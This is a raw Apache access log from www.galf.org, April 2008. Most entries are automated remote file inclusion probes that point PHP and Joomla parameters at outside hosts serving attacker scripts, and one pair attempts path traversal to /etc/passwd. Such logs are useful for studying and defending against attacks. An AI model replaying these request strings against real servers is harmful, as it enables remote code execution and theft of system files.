200.1.202.61 - - [27/Apr/2008:17:36:22 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.1.202.61 - - [27/Apr/2008:17:36:25 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:36:42 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
200.1.202.61 - - [27/Apr/2008:17:36:43 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:38:25 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:38:25 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
87.15.107.13 - - [27/Apr/2008:17:38:51 -0700] "GET /logs/access_071029.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.243.128.10 - - [27/Apr/2008:17:39:07 -0700] "GET /logs/access_080114.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.243.128.10 - - [27/Apr/2008:17:39:08 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.243.128.10 - - [27/Apr/2008:17:39:08 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.57.64.147 - - [27/Apr/2008:17:41:19 -0700] "GET /logs/access_070924.log/oneadmin/config.php?path[docroot]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.223.101.14 - - [27/Apr/2008:17:41:21 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
83.223.101.14 - - [27/Apr/2008:17:41:29 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
83.223.101.14 - - [27/Apr/2008:17:42:00 -0700] "GET /extras/ext_cats.php?dir_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
83.223.101.14 - - [27/Apr/2008:17:42:00 -0700] "GET /logs/extras/ext_cats.php?dir_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:44:04 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:44:05 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.193.50.44 - - [27/Apr/2008:17:44:30 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.pt/search?hl=pt-PT&q=lesbianas&meta=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.galf.org"
81.193.50.44 - - [27/Apr/2008:17:44:32 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.galf.org"
210.109.102.108 - - [27/Apr/2008:17:44:35 -0700] "GET /logs/access_071014.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809x0?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.21.85.101 - - [27/Apr/2008:17:44:35 -0700] "GET /logs/index2.php?x=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.21.85.101 - - [27/Apr/2008:17:44:35 -0700] "GET /index2.php?x=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.109.102.108 - - [27/Apr/2008:17:44:36 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809x0?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.109.102.108 - - [27/Apr/2008:17:44:36 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809x0?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.1.143 - - [27/Apr/2008:17:44:37 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "galf.org"
70.86.49.98 - - [27/Apr/2008:17:45:22 -0700] "GET /logs//index.php?page=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
70.86.49.98 - - [27/Apr/2008:17:45:26 -0700] "GET //index.php?page=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:45:49 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
62.141.56.36 - - [27/Apr/2008:17:45:49 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
62.141.56.36 - - [27/Apr/2008:17:45:49 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
62.141.56.36 - - [27/Apr/2008:17:46:08 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
62.141.56.36 - - [27/Apr/2008:17:46:08 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
62.141.56.36 - - [27/Apr/2008:17:46:09 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
85.17.1.143 - - [27/Apr/2008:17:46:21 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
85.17.1.143 - - [27/Apr/2008:17:46:21 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
85.17.1.143 - - [27/Apr/2008:17:46:22 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
87.106.184.203 - - [27/Apr/2008:17:46:32 -0700] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
87.106.184.203 - - [27/Apr/2008:17:46:32 -0700] "GET /logs/components/com_moodle/moodle.php?mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
200.1.202.61 - - [27/Apr/2008:17:46:32 -0700] "GET /logs/access_070903.log//index.php?lang=en&page=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.1.202.61 - - [27/Apr/2008:17:46:32 -0700] "GET //index.php?lang=en&page=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.1.202.61 - - [27/Apr/2008:17:46:33 -0700] "GET /logs//index.php?lang=en&page=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:46:44 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
213.194.149.65 - - [27/Apr/2008:17:46:44 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
213.194.149.65 - - [27/Apr/2008:17:46:44 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
190.54.49.157 - - [27/Apr/2008:17:47:16 -0700] "GET /logs/main.php?page=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:47:21 -0700] "GET /logs/access_080310.log/index.php?meio=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:47:21 -0700] "GET /index.php?meio=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:47:21 -0700] "GET /logs/index.php?meio=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:47:36 -0700] "GET /logs/access.log/index.php?meio=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
87.15.107.13 - - [27/Apr/2008:17:47:36 -0700] "GET /logs/access_080310.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.165.148.225 - - [27/Apr/2008:17:47:37 -0700] "GET /logs/access_080113.log//configuration.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.1.143 - - [27/Apr/2008:17:48:17 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:49:04 -0700] "GET /logs/access_071203.log/index.php3?pag=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:49:04 -0700] "GET /index.php3?pag=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:49:04 -0700] "GET /logs/index.php3?pag=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:49:16 -0700] "GET /logs/access.log/index.php?page=&lang=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:49:16 -0700] "GET /logs/access.log/index.php?page=&lang=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:49:16 -0700] "GET /index.php?page=&lang=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:49:17 -0700] "GET /index.php?page=&lang=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:49:17 -0700] "GET /logs/index.php?page=&lang=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:49:17 -0700] "GET /logs/index.php?page=&lang=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:49:35 -0700] "GET /logs/access_070827.log/index.php3?pag=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:17:50:40 -0700] "GET /logs/access_080114.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:17:50:42 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:17:50:44 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.86.49.98 - - [27/Apr/2008:17:50:49 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:50:52 -0700] "GET /logs/access_080324.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:50:52 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:50:52 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:50:53 -0700] "GET /logs/access_080317.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.86.49.98 - - [27/Apr/2008:17:50:55 -0700] "GET /playing.php/common/db.php?commonpath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:51:08 -0700] "GET /logs/access_071008.log/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.109.102.108 - - [27/Apr/2008:17:52:07 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809x0?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
213.194.149.65 - - [27/Apr/2008:17:52:11 -0700] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
213.194.149.65 - - [27/Apr/2008:17:52:11 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
213.194.149.65 - - [27/Apr/2008:17:52:12 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
65.55.209.190 - - [27/Apr/2008:17:53:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.190 - - [27/Apr/2008:17:53:07 -0700] "GET /logs/?D=A HTTP/1.1" 200 7516 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:17:53:15 -0700] "GET /logs/access_080303.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.17.1.143 - - [27/Apr/2008:17:55:13 -0700] "GET /logs/access_080113.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
190.54.49.157 - - [27/Apr/2008:17:55:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
190.54.49.157 - - [27/Apr/2008:17:55:59 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
200.21.85.101 - - [27/Apr/2008:17:56:56 -0700] "GET /logs/access_070924.log/index2.php?x=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.21.85.101 - - [27/Apr/2008:17:56:57 -0700] "GET /index2.php?x=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.21.85.101 - - [27/Apr/2008:17:56:57 -0700] "GET /logs/index2.php?x=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:17:57:59 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:17:57:59 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:17:57:59 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.216.238.230 - - [27/Apr/2008:17:58:14 -0700] "GET /logs/access_071231.log/main.php?page=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.216.238.230 - - [27/Apr/2008:17:58:14 -0700] "GET /logs/access_071231.log/main.php?page=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.216.238.230 - - [27/Apr/2008:17:58:16 -0700] "GET /main.php?page=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.216.238.230 - - [27/Apr/2008:17:58:16 -0700] "GET /main.php?page=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.216.238.230 - - [27/Apr/2008:17:58:18 -0700] "GET /logs/main.php?page=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.216.238.230 - - [27/Apr/2008:17:58:18 -0700] "GET /logs/main.php?page=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.21.85.101 - - [27/Apr/2008:17:58:29 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.21.85.101 - - [27/Apr/2008:17:58:30 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.205.214.163 - - [27/Apr/2008:17:59:07 -0700] "GET /logs/access_080310.log/main.php?page=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [27/Apr/2008:17:59:09 -0700] "GET /main.php?page=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [27/Apr/2008:17:59:10 -0700] "GET /logs/main.php?page=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.130.79.136 - - [27/Apr/2008:17:59:20 -0700] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sorncomputer.com/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.130.79.136 - - [27/Apr/2008:17:59:20 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sorncomputer.com/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.130.79.136 - - [27/Apr/2008:17:59:20 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sorncomputer.com/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.130.79.136 - - [27/Apr/2008:17:59:34 -0700] "GET /logs/access_070806.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sorncomputer.com/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.54.49.157 - - [27/Apr/2008:17:59:45 -0700] "GET //cm/cm_navigation.inc.php?path_pre=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
190.54.49.157 - - [27/Apr/2008:17:59:50 -0700] "GET /logs//cm/cm_navigation.inc.php?path_pre=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
201.130.79.136 - - [27/Apr/2008:18:00:44 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sorncomputer.com/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
198.106.231.114 - - [27/Apr/2008:18:00:52 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://www.misapri.com//includes/data/temp?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
198.106.231.114 - - [27/Apr/2008:18:00:53 -0700] "GET //includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://www.misapri.com//includes/data/temp?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
201.130.79.136 - - [27/Apr/2008:18:00:55 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sorncomputer.com/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
125.246.173.66 - - [27/Apr/2008:18:01:01 -0700] "GET //index.php?option=com_ricette&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
125.246.173.66 - - [27/Apr/2008:18:01:01 -0700] "GET /logs//index.php?option=com_ricette&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:01:09 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
210.109.102.108 - - [27/Apr/2008:18:01:31 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
69.59.22.11 - - [27/Apr/2008:18:02:52 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
